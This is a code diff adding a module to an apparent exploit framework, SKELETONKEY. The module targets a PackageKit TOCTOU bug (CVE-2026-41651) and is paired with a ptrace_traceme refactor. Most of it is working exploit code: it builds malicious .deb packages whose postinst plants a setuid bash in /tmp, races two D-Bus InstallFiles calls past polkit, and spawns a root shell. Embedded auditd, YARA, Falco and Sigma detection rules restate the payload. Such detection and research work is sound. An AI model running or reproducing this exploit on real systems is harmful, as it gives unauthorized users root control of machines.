+/* ── ustar tar entry ───────────────────────────────────────────────── */
+static size_t tar_entry(uint8_t *buf, const char *name, const void *data,
+			size_t dlen, mode_t mode, char type)
+{
+	memset(buf, 0, 512);
+	snprintf((char *)buf,     100, "%s", name);
+	snprintf((char *)buf+100,   8, "%07o", (unsigned)mode);
+	snprintf((char *)buf+108,   8, "%07o", 0u);
+	snprintf((char *)buf+116,   8, "%07o", 0u);
+	snprintf((char *)buf+124,  12, "%011o", (unsigned)dlen);
+	snprintf((char *)buf+136,  12, "%011o", (unsigned)time(NULL));
+	memset(buf+148, ' ', 8);
+	buf[156] = type;
+	memcpy(buf+257, "ustar", 5); memcpy(buf+263, "00", 2);
+	unsigned sum = 0; for (int i = 0; i < 512; i++) sum += buf[i];
+	snprintf((char *)buf+148, 8, "%06o", sum);
+	buf[154] = '\0'; buf[155] = ' ';
+	size_t pad = dlen ? ((dlen + 511) / 512) * 512 : 0;
+	if (dlen && data) memcpy(buf + 512, data, dlen);
+	if (pad > dlen)   memset(buf + 512 + dlen, 0, pad - dlen);
+	return 512 + pad;
+}
+
+/* ── ar member ─────────────────────────────────────────────────────── */
+static void ar_entry(FILE *f, const char *name, const void *data, size_t sz)
+{
+	char h[61]; memset(h, ' ', 60); h[60] = 0;
+	char t[17]; snprintf(t, 17, "%-16s", name); memcpy(h, t, 16);
+	snprintf(t, 13, "%-12lu", (unsigned long)time(NULL)); memcpy(h+16, t, 12);
+	memcpy(h+28, "0     ", 6); memcpy(h+34, "0     ", 6);
+	memcpy(h+40, "100644  ", 8);
+	snprintf(t, 11, "%-10zu", sz); memcpy(h+48, t, 10);
+	h[58] = '`'; h[59] = '\n';
+	fwrite(h, 1, 60, f); fwrite(data, 1, sz, f);
+	if (sz % 2) fputc('\n', f);
+}
+
+/* Assemble a minimal .deb (faithful to the V12 PoC build_deb). */
+static int build_deb(const char *dest, const char *pkg, const char *postinst)
+{
+	static uint8_t tarbuf[65536], gzbuf[65536+256];
+	memset(tarbuf, 0, sizeof tarbuf);
+	crc_init();
+	size_t off = 0;
+
+	char ctrl[512];
+	snprintf(ctrl, sizeof ctrl,
+		 "Package: %s\nVersion: 1.0\nArchitecture: all\n"
+		 "Maintainer: SKELETONKEY\nDescription: Pack2TheRoot PoC\n", pkg);
+
+	off += tar_entry(tarbuf+off, "./",        NULL,  0,             0755, '5');
+	off += tar_entry(tarbuf+off, "./control", ctrl,  strlen(ctrl),  0644, '0');
+	if (postinst)
+		off += tar_entry(tarbuf+off, "./postinst", postinst,
+				 strlen(postinst), 0755, '0');
+	off += 1024;  /* end-of-archive: two 512-byte zero blocks */
+
+	size_t ctrl_gz_len = gzip_store(tarbuf, off, gzbuf);
+	if (!ctrl_gz_len) return -1;
+
+	static uint8_t empty_tar[1024], data_gz[256];
+	memset(empty_tar, 0, sizeof empty_tar);
+	size_t data_gz_len = gzip_store(empty_tar, sizeof empty_tar, data_gz);
+
+	FILE *f = fopen(dest, "wb");
+	if (!f) return -1;
+	fwrite("!<arch>\n", 1, 8, f);
+	ar_entry(f, "debian-binary",   "2.0\n", 4);
+	ar_entry(f, "control.tar.gz",  gzbuf,   ctrl_gz_len);
+	ar_entry(f, "data.tar.gz",     data_gz, data_gz_len);
+	fclose(f);
+	return 0;
+}
+
+/* ── D-Bus helpers ─────────────────────────────────────────────────── */
+
+typedef struct { GMainLoop *loop; guint32 exit_code; gboolean done; } P2trCtx;
+
+static void cb_finished(GDBusConnection *c G_GNUC_UNUSED,
+	const gchar *s G_GNUC_UNUSED, const gchar *o G_GNUC_UNUSED,
+	const gchar *i G_GNUC_UNUSED, const gchar *n G_GNUC_UNUSED,
+	GVariant *p, gpointer u)
+{
+	P2trCtx *ctx = u; guint32 ec, rt;
+	g_variant_get(p, "(uu)", &ec, &rt);
+	LOG("transaction finished (exit=%u, %u ms)", ec, rt);
+	ctx->exit_code = ec; ctx->done = TRUE;
+	g_main_loop_quit(ctx->loop);
+}
+
+static void cb_error(GDBusConnection *c G_GNUC_UNUSED,
+	const gchar *s G_GNUC_UNUSED, const gchar *o G_GNUC_UNUSED,
+	const gchar *i G_GNUC_UNUSED, const gchar *n G_GNUC_UNUSED,
+	GVariant *p, gpointer u G_GNUC_UNUSED)
+{
+	guint32 code; const gchar *det;
+	g_variant_get(p, "(u&s)", &code, &det);
+	LOG("PK error %u: %s", code, det);
+}
+
+static gboolean cb_timeout(gpointer u)
+{
+	ERR("transaction loop timed out");
+	g_main_loop_quit(u);
+	return G_SOURCE_REMOVE;
+}
+
+static char *pk_create_tx(GDBusConnection *conn)
+{
+	GError *e = NULL;
+	GVariant *r = g_dbus_connection_call_sync(conn, PK_BUS, PK_OBJ, PK_IFACE,
+		"CreateTransaction", NULL, G_VARIANT_TYPE("(o)"),
+		G_DBUS_CALL_FLAGS_NONE, -1, NULL, &e);
+	if (!r) {
+		ERR("CreateTransaction: %s", e ? e->message : "?");
+		if (e) g_error_free(e);
+		return NULL;
+	}
+	const gchar *tid; g_variant_get(r, "(&o)", &tid);
+	char *copy = g_strdup(tid); g_variant_unref(r);
+	return copy;
+}
+
+/* Fire-and-forget: both messages must land in the server's socket
+ * buffer before the GLib idle from Step 1 fires. Faithful to the PoC. */
+static void pk_install_files_async(GDBusConnection *conn, const char *tid,
+				   guint64 flags, const char *path)
+{
+	const char *paths[] = { path, NULL };
+	g_dbus_connection_call(conn, PK_BUS, tid, PK_TX_IFACE,
+		"InstallFiles", g_variant_new("(t^as)", flags, paths),
+		NULL, G_DBUS_CALL_FLAGS_NONE, -1, NULL, NULL, NULL);
+}
+
+static bool dbus_name_has_owner(GDBusConnection *conn, const char *name)
+{
+	GError *e = NULL;
+	GVariant *r = g_dbus_connection_call_sync(conn, "org.freedesktop.DBus",
+		"/org/freedesktop/DBus", "org.freedesktop.DBus", "NameHasOwner",
+		g_variant_new("(s)", name), G_VARIANT_TYPE("(b)"),
+		G_DBUS_CALL_FLAGS_NONE, 2000, NULL, &e);
+	if (!r) { if (e) g_error_free(e); return false; }
+	gboolean has; g_variant_get(r, "(b)", &has);
+	g_variant_unref(r);
+	return (bool)has;
+}
+
+/* Read PackageKit's VersionMajor/Minor/Micro D-Bus properties. */
+static bool pk_query_version(GDBusConnection *conn, int *maj, int *min, int *mic)
+{
+	static const char *names[] = { "VersionMajor", "VersionMinor", "VersionMicro" };
+	int *out[3] = { maj, min, mic };
+	for (int i = 0; i < 3; i++) {
+		GError *e = NULL;
+		GVariant *r = g_dbus_connection_call_sync(conn, PK_BUS, PK_OBJ,
+			"org.freedesktop.DBus.Properties", "Get",
+			g_variant_new("(ss)", PK_IFACE, names[i]),
+			G_VARIANT_TYPE("(v)"), G_DBUS_CALL_FLAGS_NONE,
+			2000, NULL, &e);
+		if (!r) { if (e) g_error_free(e); return false; }
+		GVariant *vinner = NULL;
+		g_variant_get(r, "(v)", &vinner);
+		if (!vinner) { g_variant_unref(r); return false; }
+		if (g_variant_is_of_type(vinner, G_VARIANT_TYPE_UINT32))
+			*out[i] = (int)g_variant_get_uint32(vinner);
+		else if (g_variant_is_of_type(vinner, G_VARIANT_TYPE_INT32))
+			*out[i] = (int)g_variant_get_int32(vinner);
+		else {
+			g_variant_unref(vinner); g_variant_unref(r); return false;
+		}
+		g_variant_unref(vinner); g_variant_unref(r);
+	}
+	return true;
+}
+
+/* ── detect ────────────────────────────────────────────────────────── */
+
+static skeletonkey_result_t p2tr_detect(const struct skeletonkey_ctx *ctx)
+{
+	p2tr_verbose = !ctx->json;
+
+	/* "Already root" check — consult ctx->host first so unit tests
+	 * can construct a non-root fingerprint regardless of the test
+	 * process's real euid. Production main() populates host->is_root
+	 * from geteuid() at startup, so behaviour is unchanged. */
+	bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+	if (is_root) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: already root — nothing to do\n");
+		return SKELETONKEY_OK;
+	}
+
+	/* Host fingerprint short-circuits — populated once at startup. */
+	if (ctx->host && !ctx->host->is_debian_family) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: not a Debian-family host "
+				"(distro=%s) — PoC's .deb builder is Debian-only\n",
+				ctx->host->distro_id);
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+	if (ctx->host && !ctx->host->has_dbus_system) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: no system D-Bus socket at "
+				"/run/dbus/system_bus_socket — PackageKit unreachable\n");
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+
+	GError *e = NULL;
+	GDBusConnection *conn = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &e);
+	if (!conn) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: system D-Bus unavailable: %s\n",
+				e ? e->message : "(unknown)");
+		if (e) g_error_free(e);
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+
+	if (!dbus_name_has_owner(conn, PK_BUS)) {
+		if (!ctx->json)
+			fprintf(stderr, "[i] pack2theroot: PackageKit daemon not "
+				"registered on the system bus\n");
+		g_object_unref(conn);
+		return SKELETONKEY_PRECOND_FAIL;
+	}
+
+	int maj = 0, min = 0, mic = 0;
+	bool got_version = pk_query_version(conn, &maj, &min, &mic);
+	g_object_unref(conn);
+
+	if (!got_version) {
+		if (!ctx->json)
+			fprintf(stderr, "[?] pack2theroot: PackageKit running but "
+				"VersionMajor/Minor/Micro unreadable — patch-level "
+				"unknown\n");
+		return SKELETONKEY_TEST_ERROR;
+	}
+
+	int v = P2TR_VER(maj, min, mic);
+	if (!ctx->json)
+		fprintf(stderr, "[*] pack2theroot: PackageKit %d.%d.%d on the bus\n",
+			maj, min, mic);
+
+	if (v < P2TR_VER_LO) {
+		if (!ctx->json)
+			fprintf(stderr, "[+] pack2theroot: %d.%d.%d predates the bug "
+				"(introduced in 1.0.2)\n", maj, min, mic);
+		return SKELETONKEY_OK;
+	}
+	if (v > P2TR_VER_HI) {
+		if (!ctx->json)
+			fprintf(stderr, "[+] pack2theroot: %d.%d.%d is patched "
+				"(fixed in 1.3.5, commit 76cfb675)\n", maj, min, mic);
+		return SKELETONKEY_OK;
+	}
+	if (!ctx->json)
+		fprintf(stderr, "[!] pack2theroot: PackageKit %d.%d.%d is "
+			"VULNERABLE (range 1.0.2 ≤ V ≤ 1.3.4)\n", maj, min, mic);
+	return SKELETONKEY_VULNERABLE;
+}
+
+/* ── exploit child (faithful port of the PoC main() body) ──────────── */
+
+static int p2tr_child_run(int no_shell)
+{
+	char dummy[64], payload[64], postinst[160];
+	snprintf(dummy,    sizeof dummy,    "/tmp/.pk-dummy-%d.deb",    getpid());
+	snprintf(payload,  sizeof payload,  "/tmp/.pk-payload-%d.deb",  getpid());
+	snprintf(postinst, sizeof postinst,
+		 "#!/bin/sh\ninstall -m 4755 /bin/bash %s\n", SUID_PATH);
+
+	LOG("building .deb packages (pure C; ar/tar/gzip inline)");
+	if (build_deb(dummy,   "skeletonkey-p2tr-dummy",   NULL) < 0) {
+		ERR("dummy .deb build failed");
+		return 2;
+	}
+	if (build_deb(payload, "skeletonkey-p2tr-payload", postinst) < 0) {
+		ERR("payload .deb build failed"); unlink(dummy);
+		return 2;
+	}
+	if (access(dummy, F_OK) != 0 || access(payload, F_OK) != 0) {
+		ERR("built .deb files are missing"); return 2;
+	}
+	LOG("dummy   : %s", dummy);
+	LOG("payload : %s", payload);
+
+	GError *err = NULL;
+	GDBusConnection *conn = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &err);
+	if (!conn) {
+		ERR("system D-Bus: %s", err ? err->message : "?");
+		if (err) g_error_free(err);
+		unlink(dummy); unlink(payload);
+		return 4;
+	}
+
+	char *tid = pk_create_tx(conn);
+	if (!tid) { g_object_unref(conn); unlink(dummy); unlink(payload); return 2; }
+	LOG("transaction : %s", tid);
+
+	P2trCtx pkctx = { .loop = g_main_loop_new(NULL, FALSE), .done = FALSE };
+	guint sf = g_dbus_connection_signal_subscribe(conn, PK_BUS, PK_TX_IFACE,
+		"Finished",  tid, NULL, G_DBUS_SIGNAL_FLAGS_NONE, cb_finished, &pkctx, NULL);
+	guint se = g_dbus_connection_signal_subscribe(conn, PK_BUS, PK_TX_IFACE,
+		"ErrorCode", tid, NULL, G_DBUS_SIGNAL_FLAGS_NONE, cb_error,    NULL,   NULL);
+
+	/* ── EXPLOIT ───────────────────────────────────────────────────── */
+	LOG("step 1: InstallFiles(SIMULATE=0x%llx, dummy) [async]",
+	    (unsigned long long)FLAG_SIMULATE);
+	pk_install_files_async(conn, tid, FLAG_SIMULATE, dummy);
+
+	LOG("step 2: InstallFiles(NONE=0x%llx, payload) [async]",
+	    (unsigned long long)FLAG_NONE);
+	pk_install_files_async(conn, tid, FLAG_NONE, payload);
+
+	/* Flush so both messages land in the server's socket buffer before
+	 * its main loop runs the GLib idle from step 1. */
+	{
+		GError *fe = NULL;
+		if (!g_dbus_connection_flush_sync(conn, NULL, &fe)) {
+			ERR("D-Bus flush: %s", fe ? fe->message : "?");
+			g_clear_error(&fe);
+		}
+	}
+
+	LOG("awaiting dispatch (30s max)");
+	g_timeout_add_seconds(30, cb_timeout, pkctx.loop);
+	g_main_loop_run(pkctx.loop);
+
+	g_dbus_connection_signal_unsubscribe(conn, sf);
+	g_dbus_connection_signal_unsubscribe(conn, se);
+	g_free(tid);
+	g_object_unref(conn);
+
+	/* Record /tmp paths for cleanup() even if the SUID never lands. */
+	int sf2 = open("/tmp/skeletonkey-pack2theroot.state",
+		       O_WRONLY | O_CREAT | O_TRUNC, 0600);
+	if (sf2 >= 0) {
+		dprintf(sf2, "%s\n%s\n", dummy, payload);
+		close(sf2);
+	}
+
+	/* Poll up to 120s for the SUID bash; the APT backend may keep
+	 * running after polkit fires. Faithful to the PoC's polling loop. */
+	LOG("polling for SUID payload at %s (120s max)", SUID_PATH);
+	struct stat st;
+	int appeared_at = -1;
+	for (int i = 0; i < 1200; i++) {
+		usleep(100000);  /* 100 ms */
+		if (i % 50 == 0 && p2tr_verbose) {
+			int lock_fd = open("/var/lib/dpkg/lock", O_RDONLY);
+			int lock_held = 0;
+			if (lock_fd >= 0) {
+				lock_held = (flock(lock_fd, LOCK_EX | LOCK_NB) != 0);
+				if (!lock_held) flock(lock_fd, LOCK_UN);
+				close(lock_fd);
+			}
+			fprintf(stderr, "[*] pack2theroot:   t+%ds  payload=%s  "
+				"dpkg_lock=%s  suid=%s\n",
+				(i/10)+1,
+				access(payload, F_OK) == 0 ? "present" : "consumed",
+				lock_held ? "held" : "free",
+				access(SUID_PATH, F_OK) == 0 ? "FOUND" : "not yet");
+		}
+		if (stat(SUID_PATH, &st) == 0 && (st.st_mode & S_ISUID)) {
+			appeared_at = i;
+			break;
+		}
+	}
+
+	if (appeared_at < 0) {
+		ERR("SUID bash never appeared at %s within 120s", SUID_PATH);
+		return 3;   /* EXPLOIT_FAIL */
+	}
+
+	LOG("SUCCESS — SUID bash landed at t+%dms", appeared_at * 100);
+
+	if (no_shell) {
+		LOG("--no-shell: payload placed, root shell not spawned");
+		LOG("revert with `skeletonkey --cleanup pack2theroot` (needs root)");
+		return 0;
+	}
+
+	/* Exec the SUID bash interactively. */
+	if (isatty(STDIN_FILENO)) {
+		char *ttydev = ttyname(STDIN_FILENO);
+		pid_t child = fork();
+		if (child == 0) {
+			setsid();
+			if (ttydev) {
+				int t = open(ttydev, O_RDWR);
+				if (t >= 0) {
+					ioctl(t, TIOCSCTTY, 1);
+					dup2(t, 0); dup2(t, 1); dup2(t, 2);
+					if (t > 2) close(t);
+				}
+			}
+			char *argv[] = { (char *)SUID_PATH, "-p", NULL };
+			execv(SUID_PATH, argv);
+			_exit(1);
+		}
+		if (child > 0) { int s; waitpid(child, &s, 0); }
+	} else {
+		/* Non-tty: just exec the SUID bash (replaces our process). */
+		char *argv[] = { (char *)SUID_PATH, "-p", NULL };
+		execv(SUID_PATH, argv);
+		ERR("execv(%s): %s", SUID_PATH, strerror(errno));
+		return 3;
+	}
+	return 0;
+}
+
+static skeletonkey_result_t p2tr_exploit(const struct skeletonkey_ctx *ctx)
+{
+	p2tr_verbose = !ctx->json;
+
+	if (geteuid() == 0) {
+		fprintf(stderr, "[i] pack2theroot: already root — nothing to do\n");
+		return SKELETONKEY_OK;
+	}
+
+	pid_t pid = fork();
+	if (pid < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
+	if (pid == 0) {
+		int rc = p2tr_child_run(ctx->no_shell);
+		_exit(rc);
+	}
+	int st;
+	waitpid(pid, &st, 0);
+	if (!WIFEXITED(st)) return SKELETONKEY_EXPLOIT_FAIL;
+	switch (WEXITSTATUS(st)) {
+	case 0:  return SKELETONKEY_EXPLOIT_OK;
+	case 4:  return SKELETONKEY_PRECOND_FAIL;
+	default: return SKELETONKEY_EXPLOIT_FAIL;
+	}
+}
+
+/* ── cleanup ───────────────────────────────────────────────────────── */
+
+static skeletonkey_result_t p2tr_cleanup(const struct skeletonkey_ctx *ctx)
+{
+	p2tr_verbose = !ctx->json;
+
+	/* Remove the two staged .debs (recorded during exploit). */
+	int sf = open("/tmp/skeletonkey-pack2theroot.state", O_RDONLY);
+	if (sf >= 0) {
+		char buf[512] = {0};
+		ssize_t n = read(sf, buf, sizeof(buf) - 1);
+		close(sf);
+		if (n > 0) {
+			char *line = strtok(buf, "\n");
+			while (line) {
+				if (unlink(line) == 0) LOG("removed %s", line);
+				line = strtok(NULL, "\n");
+			}
+		}
+		unlink("/tmp/skeletonkey-pack2theroot.state");
+	}
+
+	/* Best-effort remove the SUID bash. It is owned by root, so this
+	 * only succeeds when cleanup runs with root privileges (e.g. the
+	 * caller already used the SUID shell to escalate). */
+	if (access(SUID_PATH, F_OK) == 0) {
+		if (unlink(SUID_PATH) == 0) {
+			LOG("removed %s", SUID_PATH);
+		} else {
+			ERR("could not remove %s (%s); rerun cleanup as root, or:",
+			    SUID_PATH, strerror(errno));
+			ERR("   sudo rm -f %s", SUID_PATH);
+		}
+	}
+
+	/* Best-effort: uninstall the malicious package via passwordless sudo. */
+	if (system("sudo -n dpkg -r skeletonkey-p2tr-payload skeletonkey-p2tr-dummy "
+		   ">/dev/null 2>&1") == 0) {
+		LOG("dpkg -r removed staged packages");
+	} else {
+		LOG("dpkg -r not run automatically; if needed:");
+		LOG("   sudo dpkg -r skeletonkey-p2tr-payload skeletonkey-p2tr-dummy");
+	}
+	return SKELETONKEY_OK;
+}
+
+#else  /* !__linux__ || !PACK2TR_HAVE_GIO */
+
+static skeletonkey_result_t p2tr_detect(const struct skeletonkey_ctx *ctx)
+{
+	if (!ctx->json) {
+#ifndef __linux__
+		fprintf(stderr, "[i] pack2theroot: Linux-only module "
+			"(PackageKit D-Bus) — not applicable on this platform\n");
+#else
+		fprintf(stderr, "[i] pack2theroot: module built without "
+			"GLib/gio-2.0 support — install libglib2.0-dev and rebuild\n");
+#endif
+	}
+	return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t p2tr_exploit(const struct skeletonkey_ctx *ctx)
+{
+	(void)ctx;
+	fprintf(stderr, "[-] pack2theroot: not built with GLib/gio-2.0 support\n");
+	return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t p2tr_cleanup(const struct skeletonkey_ctx *ctx)
+{
+	(void)ctx;
+	return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ && PACK2TR_HAVE_GIO */
+
+/* ── embedded detection rules ──────────────────────────────────────── */
+
+static const char p2tr_auditd[] =
+	"# Pack2TheRoot (CVE-2026-41651) — auditd detection rules\n"
+	"# PackageKit TOCTOU LPE: two back-to-back InstallFiles D-Bus calls\n"
+	"# install a malicious .deb as root and drop a SUID bash in /tmp.\n"
+	"# Watch the side effects — D-Bus calls themselves aren't auditable\n"
+	"# without bus-monitoring, but the file footprint is unmistakable.\n"
+	"\n"
+	"# SUID bash carrier that the PoC postinst lands\n"
+	"-w /tmp/.suid_bash -p wa -k skeletonkey-pack2theroot\n"
+	"\n"
+	"# Any new setuid binary owned by root in /tmp is suspicious\n"
+	"-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat \\\n"
+	"    -F path=/tmp/.suid_bash -k skeletonkey-pack2theroot-suid\n"
+	"\n"
+	"# The PoC drops two .deb files in /tmp before the install fires\n"
+	"-a always,exit -F arch=b64 -S openat,creat \\\n"
+	"    -F dir=/tmp -F success=1 -k skeletonkey-pack2theroot-deb\n"
+	"\n"
+	"# packagekitd-driven dpkg activity initiated by a non-root caller\n"
+	"-a always,exit -F arch=b64 -S execve -F path=/usr/bin/dpkg \\\n"
+	"    -F auid!=0 -k skeletonkey-pack2theroot-dpkg\n"
+	"-a always,exit -F arch=b64 -S execve -F path=/usr/bin/apt-get \\\n"
+	"    -F auid!=0 -k skeletonkey-pack2theroot-apt\n";
+
+static const char p2tr_yara[] =
+    "rule pack2theroot_malicious_deb : cve_2026_41651\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-41651\"\n"
+    "        description = \"Pack2TheRoot payload .deb: small ar archive whose postinst installs a setuid copy of bash to /tmp/.suid_bash. The Vozec PoC + SKELETONKEY's port both leave this artifact in /tmp.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "        reference   = \"https://github.com/Vozec/CVE-2026-41651\"\n"
+    "    strings:\n"
+    "        $deb_magic       = \"!<arch>\"\n"
+    "        $postinst_suid   = \"install -m 4755 /bin/bash\"\n"
+    "        $skk_payload     = \"Package: skeletonkey-p2tr-payload\"\n"
+    "        $skk_dummy       = \"Package: skeletonkey-p2tr-dummy\"\n"
+    "        $vozec_payload   = \"Package: pk-poc-payload\"\n"
+    "        $vozec_dummy     = \"Package: pk-poc-dummy\"\n"
+    "    condition:\n"
+    "        // Small ar archive matching .deb layout, containing either\n"
+    "        // the published-PoC package names or the SUID-bash postinst.\n"
+    "        $deb_magic at 0 and\n"
+    "        ($postinst_suid or any of ($skk_payload, $skk_dummy, $vozec_payload, $vozec_dummy)) and\n"
+    "        filesize < 64KB\n"
+    "}\n"
+    "\n"
+    "rule pack2theroot_suid_bash_drop : cve_2026_41651\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2026-41651\"\n"
+    "        description = \"Pack2TheRoot SUID-bash artifact: /tmp/.suid_bash is the setuid bash dropped by the malicious postinst. Pair this YARA scan with auditd watch -w /tmp/.suid_bash for catch-on-create.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $elf  = { 7F 45 4C 46 02 01 01 }\n"
+    "        $bash = \"GNU bash\"\n"
+    "    condition:\n"
+    "        // The rule itself can't see the file path; the operator\n"
+    "        // points YARA at /tmp/.suid_bash specifically. Match\n"
+    "        // confirms the file is a real bash ELF (not a planted decoy).\n"
+    "        $elf at 0 and $bash\n"
+    "}\n";
+
+static const char p2tr_falco[] =
+    "- rule: SUID bash dropped to /tmp (Pack2TheRoot postinst signature)\n"
+    "  desc: |\n"
+    "    A setuid bit appears on /tmp/.suid_bash. The Pack2TheRoot\n"
+    "    (CVE-2026-41651) malicious .deb postinst runs as root via\n"
+    "    the polkit-bypassed PackageKit transaction and lands a SUID\n"
+    "    copy of /bin/bash at this path.\n"
+    "  condition: >\n"
+    "    evt.type in (chmod, fchmod, fchmodat) and\n"
+    "    evt.arg.mode contains \"S_ISUID\" and\n"
+    "    fd.name = /tmp/.suid_bash\n"
+    "  output: >\n"
+    "    SUID bit set on /tmp/.suid_bash (proc=%proc.name pid=%proc.pid\n"
+    "     ppid=%proc.ppid parent=%proc.pname)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2026.41651]\n"
+    "\n"
+    "- rule: PackageKit InstallFiles invoked twice on same transaction (Pack2TheRoot TOCTOU)\n"
+    "  desc: |\n"
+    "    Two D-Bus InstallFiles() calls hit the same PackageKit\n"
+    "    transaction object in close succession — the exact shape of\n"
+    "    the Pack2TheRoot TOCTOU. Detection requires bus monitoring;\n"
+    "    Falco's k8s/audit ruleset doesn't cover D-Bus natively, but\n"
+    "    if dbus-monitor or systemd's bus audit is wired into the\n"
+    "    feed, this is the trigger.\n"
+    "  condition: >\n"
+    "    // Placeholder: requires dbus-monitor → falco feed.\n"
+    "    // Real-world deployment: pipe `dbus-monitor --system` into\n"
+    "    // a log-source rule keyed on the InstallFiles method name.\n"
+    "    proc.cmdline contains \"InstallFiles\" and proc.cmdline contains \"PackageKit\"\n"
+    "  output: >\n"
+    "    Possible Pack2TheRoot D-Bus TOCTOU shape (cmdline=\"%proc.cmdline\")\n"
+    "  priority: WARNING\n"
+    "  tags: [dbus, cve.2026.41651]\n"
+    "\n"
+    "- rule: dpkg invoked by PackageKit on behalf of non-root caller\n"
+    "  desc: |\n"
+    "    PackageKit forks dpkg to install a .deb on behalf of an\n"
+    "    unprivileged caller. Combined with /tmp/.suid_bash creation,\n"
+    "    this completes the Pack2TheRoot exploit chain.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = dpkg and proc.aname = packagekitd and\n"
+    "    proc.cmdline contains \"/tmp/.pk-\"\n"
+    "  output: >\n"
+    "    PackageKit-driven dpkg install of /tmp-resident .deb\n"
+    "    (parent=%proc.pname cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, cve.2026.41651, pack2theroot]\n";
+
+static const char p2tr_sigma[] =
+	"title: Possible Pack2TheRoot exploitation (CVE-2026-41651)\n"
+	"id: 3f2b8d54-skeletonkey-pack2theroot\n"
+	"status: experimental\n"
+	"description: |\n"
+	"  Detects the footprint of Pack2TheRoot (CVE-2026-41651): a non-root\n"
+	"  user triggers PackageKit InstallFiles, dpkg runs a postinst that\n"
+	"  drops /tmp/.suid_bash (a setuid bash), and a privileged shell\n"
+	"  follows. The trigger itself is two back-to-back D-Bus calls with\n"
+	"  no polkit prompt — only visible via dbus-monitor or the file\n"
+	"  side effects.\n"
+	"references:\n"
+	"  - https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html\n"
+	"  - https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv\n"
+	"logsource: {product: linux, service: auditd}\n"
+	"detection:\n"
+	"  suid_drop:\n"
+	"    type: 'PATH'\n"
+	"    name|startswith: ['/tmp/.suid_bash', '/tmp/.pk-payload-', '/tmp/.pk-dummy-']\n"
+	"  not_root:\n"
+	"    auid|expression: '!= 0'\n"
+	"  condition: suid_drop and not_root\n"
+	"level: high\n"
+	"tags:\n"
+	"  - attack.privilege_escalation\n"
+	"  - attack.t1068\n"
+	"  - cve.2026.41651\n";
+
+const struct skeletonkey_module pack2theroot_module = {
+	.name           = "pack2theroot",
+	.cve            = "CVE-2026-41651",
+	.summary        = "PackageKit InstallFiles TOCTOU → root via .deb postinst",
+	.family         = "pack2theroot",
+	.kernel_range   = "userspace — PackageKit 1.0.2 ≤ V ≤ 1.3.4 (fixed in 1.3.5)",
+	.detect         = p2tr_detect,
+	.exploit        = p2tr_exploit,
+	.mitigate       = NULL,
+	.cleanup        = p2tr_cleanup,
+	.detect_auditd  = p2tr_auditd,
+	.detect_sigma   = p2tr_sigma,
+	.detect_yara    = p2tr_yara,
+	.detect_falco   = p2tr_falco,
+    .opsec_notes    = "TOCTOU race in PackageKit's polkit-auth + D-Bus InstallFiles dispatcher: sends back-to-back async calls (first with SIMULATE to bypass polkit, second with the malicious .deb) so the cached flags are overwritten before the idle callback fires. Builds a minimal .deb ar archive in pure C with a postinst that installs a setuid bash. Writes /tmp/.pk-dummy-<pid>.deb, /tmp/.pk-payload-<pid>.deb, and /tmp/skeletonkey-pack2theroot.state; via the polkit-bypassed postinst plants /tmp/.suid_bash setuid root. Audit-visible via dpkg execve from packagekitd for a non-root caller, chmod(2) on /tmp/.suid_bash, creat/openat on the .deb files. Cleanup callback unlinks the .debs and best-effort removes /tmp/.suid_bash (which is owned by root).",
+};
+
+void skeletonkey_register_pack2theroot(void)
+{
+	skeletonkey_register(&pack2theroot_module);
+}
@@ -0,0 +1,12 @@
+/*
+ * pack2theroot_cve_2026_41651 — SKELETONKEY module registry hook
+ */
+
+#ifndef PACK2THEROOT_SKELETONKEY_MODULES_H
+#define PACK2THEROOT_SKELETONKEY_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct skeletonkey_module pack2theroot_module;
+
+#endif
@@ -28,13 +28,17 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include <errno.h>
 #include <fcntl.h>
 #include <pwd.h>
@@ -63,32 +67,37 @@ static const struct kernel_range ptrace_traceme_range = {

 static skeletonkey_result_t ptrace_traceme_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] ptrace_traceme: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] ptrace_traceme: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug existed since ptrace's inception (early 2.x); anything
     * pre-LTS-backport is vulnerable. Anything < 4.4 in our range
     * model defaults to vulnerable since no entry covers it. */
-    if (v.major < 4 || (v.major == 4 && v.minor < 4)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 4, 0)) {
